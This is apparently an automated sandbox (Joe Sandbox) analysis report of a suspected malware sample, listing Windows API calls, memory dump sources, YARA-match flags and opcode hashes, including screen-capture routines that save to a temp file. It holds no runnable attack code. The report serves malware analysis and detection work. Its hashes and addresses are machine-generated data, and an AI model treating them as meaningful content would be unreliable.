                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  APIs
                                                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 04832648
                                                                                  • PostQuitMessage.USER32(00000000), ref: 048327EA
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: MessageNtdllPostProc_QuitWindow
                                                                                  • String ID:
                                                                                  • API String ID: 4264772764-0
                                                                                  APIs
                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CDA,?,?,00000008,?,?,0043F19B,00000000), ref: 00436F0C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise
                                                                                  • String ID:
                                                                                  • API String ID: 3997070919-0
                                                                                  APIs
                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,04866F41,?,?,00000008,?,?,0486F402,00000000), ref: 04867173
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionRaise
                                                                                  • String ID:
                                                                                  • API String ID: 3997070919-0
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B6B9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free$InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2955987475-0
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 048621C0
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621CD
                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0486B920
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$_free$InfoLocale
                                                                                  • String ID:
                                                                                  • API String ID: 2955987475-0
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,004307D5,?,0043BA42,00000000,?,?,?), ref: 0043B35F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                  • String ID:
                                                                                  • API String ID: 2016158738-0
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  • EnumSystemLocalesW.KERNEL32(0043B415,00000001,00000000,?,04860A3C,?,0486BCA9,00000000,?,?,?), ref: 0486B5C6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                  • String ID:
                                                                                  • API String ID: 2016158738-0
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B633,00000000,00000000,?), ref: 0043B8C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InfoLocale_free
                                                                                  • String ID:
                                                                                  • API String ID: 787680540-0
                                                                                  • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                  • Instruction ID: cee2b43c6a9fd0cc18a312a7fa4a4d5932635e218f943acbfed5d814f3d68c37
                                                                                  • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                                  • Instruction Fuzzy Hash: 79F0F936A00215ABDB2C6A26DC067BB775CEF44754F15442AEE05A3240EB39BE4186D8
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0486B89A,00000000,00000000,?), ref: 0486BB28
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$InfoLocale_free
                                                                                  • String ID:
                                                                                  • API String ID: 787680540-0
                                                                                  • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                  • Instruction ID: fd855d55f779da830cb71ea485573d9f6da0771c3fa3be52f392a1f4ad9f2338
                                                                                  • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                                  • Instruction Fuzzy Hash: 89F0F932A001256BDB645E648C45FBA775CEB4071CF040E69DC07E3184EA70FF01C6D4
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  • EnumSystemLocalesW.KERNEL32(0043B665,00000001,?,?,004307D5,?,0043BA06,004307D5,?,?,?,?,?,004307D5,?,?), ref: 0043B3D4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                  • String ID:
                                                                                  • API String ID: 2016158738-0
                                                                                  • Opcode ID: d6cb40d020c0f10101038f95f210870574939c9cf499dc93c49f7b68341f8f2e
                                                                                  • Instruction ID: 8e36b55a9bc7705faaba13b87098130e4a65547030758f83ed228488c18c5ef1
                                                                                  • Opcode Fuzzy Hash: d6cb40d020c0f10101038f95f210870574939c9cf499dc93c49f7b68341f8f2e
                                                                                  • Instruction Fuzzy Hash: BCF0C2362003045FDB145F3A9C92B6A7B95EF88768F15852EFE468B650D7B59C02C684
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  • EnumSystemLocalesW.KERNEL32(0043B665,00000001,?,?,04860A3C,?,0486BC6D,04860A3C,?,?,?,?,?,04860A3C,?,?), ref: 0486B63B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                  • String ID:
                                                                                  • API String ID: 2016158738-0
                                                                                  • Opcode ID: 8a71536dd7903a37c32e393faf36bdd1bfe0e15f9a3a0bcd0082b4142840c2ea
                                                                                  • Instruction ID: b2824c852274be8f66d2a7b8f8ba3221e9ea91631cad403b90f08b1af57d4d67
                                                                                  • Opcode Fuzzy Hash: 8a71536dd7903a37c32e393faf36bdd1bfe0e15f9a3a0bcd0082b4142840c2ea
                                                                                  • Instruction Fuzzy Hash: BDF022363007041FEB145F398C81A6A7B91EF8072CF154A2DEA06CB680E6B1B8028604
                                                                                  APIs
                                                                                    • Part of subcall function 0042E40D: EnterCriticalSection.KERNEL32(?,?,00431C9A,?,00457A38,00000008,00431D68,?,?,?), ref: 0042E41C
                                                                                  • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 00434E25
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1272433827-0
                                                                                  • Opcode ID: 7994b66f8d059e0a4ea4c0566bc6fd84287e6518e046040a995cb3296bdf7f9b
                                                                                  • Instruction ID: 31781df083fb6f98b94d2300e169204e9eab98a1842135cb0ce39f8875023ccf
                                                                                  • Opcode Fuzzy Hash: 7994b66f8d059e0a4ea4c0566bc6fd84287e6518e046040a995cb3296bdf7f9b
                                                                                  • Instruction Fuzzy Hash: 57F04F32A103009FD754EF69E906B8D77E0AB49726F10426AF910DB2E2CB7999848F49
                                                                                  APIs
                                                                                    • Part of subcall function 0485E674: RtlEnterCriticalSection.NTDLL(043E0DD4), ref: 0485E683
                                                                                  • EnumSystemLocalesW.KERNEL32(00434DA7,00000001,00457BB8,0000000C), ref: 0486508C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                  • String ID:
                                                                                  • API String ID: 1272433827-0
                                                                                  • Opcode ID: 91255582852f62f49bbb7f6d609e28063f3a8d390254579dd7c371b3acb579f0
                                                                                  • Instruction ID: 7f0ab073676b98a90c422d37a405f1a266e40077c33459130502807d8fe70801
                                                                                  • Opcode Fuzzy Hash: 91255582852f62f49bbb7f6d609e28063f3a8d390254579dd7c371b3acb579f0
                                                                                  • Instruction Fuzzy Hash: 93F0AF32A10304DFEB00EF6CD805B5D3BE0AF45715F104665FA00DB2E1CBB9AA44CB4A
                                                                                  APIs
                                                                                    • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                    • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                    • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                  • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,?,?,?,0043BA64,004307D5,?,?,?,?,?,004307D5,?,?,?), ref: 0043B2D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                  • String ID:
                                                                                  • API String ID: 2016158738-0
                                                                                  • Opcode ID: 5abaff1671bb674c6eafe0f2cce25488b1c0be8fa004c8119abb9d1d27339480
                                                                                  • Instruction ID: 792a508546450a8c62dd781f30710cea9d26762123306e32df2f83f98e4bbb46
                                                                                  • Opcode Fuzzy Hash: 5abaff1671bb674c6eafe0f2cce25488b1c0be8fa004c8119abb9d1d27339480
                                                                                  • Instruction Fuzzy Hash: 62F0203A30020497CB04AF7AD85A76BBF90EBC5B54F0A409AEF098B250C6399842C798
                                                                                  APIs
                                                                                    • Part of subcall function 04862161: GetLastError.KERNEL32(?,?,0485AA0C,?,00000000,?,0485CE06,0483249A,00000000,?,00451F20), ref: 04862165
                                                                                    • Part of subcall function 04862161: _free.LIBCMT ref: 04862198
                                                                                    • Part of subcall function 04862161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 048621D9
                                                                                  • EnumSystemLocalesW.KERNEL32(0043B1F9,00000001,?,?,?,0486BCCB,04860A3C,?,?,?,?,?,04860A3C,?,?,?), ref: 0486B540
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$EnumLocalesSystem_free
                                                                                  • String ID:
                                                                                  • API String ID: 2016158738-0
                                                                                  • Opcode ID: 7e45c69b4bd48ea0a58e1bc64ad8673d17a770c848b88e6c6a4e287bad9e638c
                                                                                  • Instruction ID: 154bc09c86d8756be8f372c41f47be71f76fcb45142b99b87e0f454213ad7c99
                                                                                  • Opcode Fuzzy Hash: 7e45c69b4bd48ea0a58e1bc64ad8673d17a770c848b88e6c6a4e287bad9e638c
                                                                                  • Instruction Fuzzy Hash: 00F05C3630020457CB04AF79DC0876A7F90EFC1754F060059EF06CB240C271F442C790
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00010692,0040FC1E), ref: 0041068B
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                  • Instruction ID: 98c1b70154c3c6394ebbf277c14e22134dfc73ab602bc766ac458664b600bd4b
                                                                                  • Opcode Fuzzy Hash: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                  • Instruction Fuzzy Hash:
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00410692,0483FE85), ref: 048408F2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                  • Instruction ID: 98c1b70154c3c6394ebbf277c14e22134dfc73ab602bc766ac458664b600bd4b
                                                                                  • Opcode Fuzzy Hash: 6cf26b4471ecbc88141dfed73a91e81ad7907fcfa0cdea6a3473b6b210d5516f
                                                                                  • Instruction Fuzzy Hash:
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: HeapProcess
                                                                                  • String ID:
                                                                                  • API String ID: 54951025-0
                                                                                  • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                  • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                                                  • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                                                  • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                  • Instruction ID: b4093df590a21e34b028a8b1fc7d27a52c9cbab165512cb59d6a43ae298a81d2
                                                                                  • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                                                  • Instruction Fuzzy Hash: 61324661D68F014DE7339634C822336A698AFBB3D4F15E737F859B5EA6EB28C4834105
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e46bd4f707ba7a9ceb031d9cd86521102eb103cae0c179e5e6aa0592395d1ff4
                                                                                  • Instruction ID: 8d7dcf63c468df939a74f501716ec15b8f2183c69ee07cfca9113f75d84f5853
                                                                                  • Opcode Fuzzy Hash: e46bd4f707ba7a9ceb031d9cd86521102eb103cae0c179e5e6aa0592395d1ff4
                                                                                  • Instruction Fuzzy Hash: C3E19270A08612EFD714CF24C590AAAB7F1FF44304B14456ED856ABB81D738FC61DB96
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                                                  • Instruction ID: c76e0d6d5e685436edb54830178ac8e3711af84bf5607d347098698f66ee85ba
                                                                                  • Opcode Fuzzy Hash: 00d6ba4a2d84f0801e1b0a96c170955ef3db55fa66fb4acd58968073f34e18d5
                                                                                  • Instruction Fuzzy Hash: 9BD1BB722081A24DCB2E4E398470036BFE15A4216171D8F9EDCF7CB5E6ED14F564D660
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                  • Instruction ID: 80968e5e8bc017810328c9ff139e3a08396a4cd6bf5f0c598f5f88a651707172
                                                                                  • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                  • Instruction Fuzzy Hash: C691743230D0B34ADB29463DA53413FFFE15E523A139A079FE4F2CA2C5EE289954D624
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
APIs
• DefWindowProcW.USER32(?,00000014,?,?), ref: 00402151
• GetClientRect.USER32(?,?), ref: 00402166
• GetDC.USER32(?), ref: 0040216D
• CreateSolidBrush.GDI32(00646464), ref: 00402180
• SelectObject.GDI32(00000000,00000000), ref: 00402194
• CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 0040219F
• SelectObject.GDI32(00000000,00000000), ref: 004021AD
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021C0
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021CB
• MulDiv.KERNEL32(00000008,00000000), ref: 004021D4
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021F8
• SelectObject.GDI32(00000000,00000000), ref: 00402206
• SetBkMode.GDI32(?,00000001), ref: 00402283
• SetTextColor.GDI32(?,00000000), ref: 00402292
• _wcslen.LIBCMT ref: 0040229B
Strings
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
• String ID: Tahoma
• API String ID: 3832963559-3580928618
APIs
• DestroyWindow.USER32(?), ref: 004025ED
• DefWindowProcW.USER32(?,00000204,?,?), ref: 004025FF
• ReleaseCapture.USER32 ref: 00402612
• GetDC.USER32(00000000), ref: 00402639
• CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026C0
• CreateCompatibleDC.GDI32(?), ref: 004026C9
• SelectObject.GDI32(00000000,00000000), ref: 004026D3
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 00402701
• ShowWindow.USER32(?,00000000), ref: 0040270A
• GetTempPathW.KERNEL32(00000104,?), ref: 0040271C
• GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402737
• DeleteFileW.KERNEL32(?), ref: 00402751
• DeleteDC.GDI32(00000000), ref: 00402758
• DeleteObject.GDI32(00000000), ref: 0040275F
• ReleaseDC.USER32(00000000,?), ref: 0040276D
• DestroyWindow.USER32(?), ref: 00402774
• SetCapture.USER32(?), ref: 004027C1
• GetDC.USER32(00000000), ref: 004027F5
• ReleaseDC.USER32(00000000,00000000), ref: 0040280B
• GetKeyState.USER32(0000001B), ref: 00402818
• DestroyWindow.USER32(?), ref: 0040282D
Strings
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
• String ID: gya
• API String ID: 2545303185-1989253062
APIs
Memory Dump Source
• Source File: 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_TP77MvSzt2.jbxd
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
APIs
Memory Dump Source
• Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
Yara matches
Similarity
• API ID: _free$Info
• String ID:
• API String ID: 2509303402-0
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 04850C56
                                                                                  • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 04850CBD
                                                                                  • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 04850CDA
                                                                                  • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 04850D40
                                                                                  • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 04850D55
                                                                                  • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 04850D67
                                                                                  • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 04850D95
                                                                                  • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 04850DA0
                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 04850DCC
                                                                                  • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 04850DDC
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Offset: 04830000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_4830000_TP77MvSzt2.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                  • String ID: 11@$%D
                                                                                  • API String ID: 3720063390-4114847594
                                                                                  APIs
                                                                                  • ___free_lconv_mon.LIBCMT ref: 0043A65C
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 004399C8
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 004399DA
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 004399EC
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 004399FE
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A10
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A22
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A34
                                                                                    • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A46
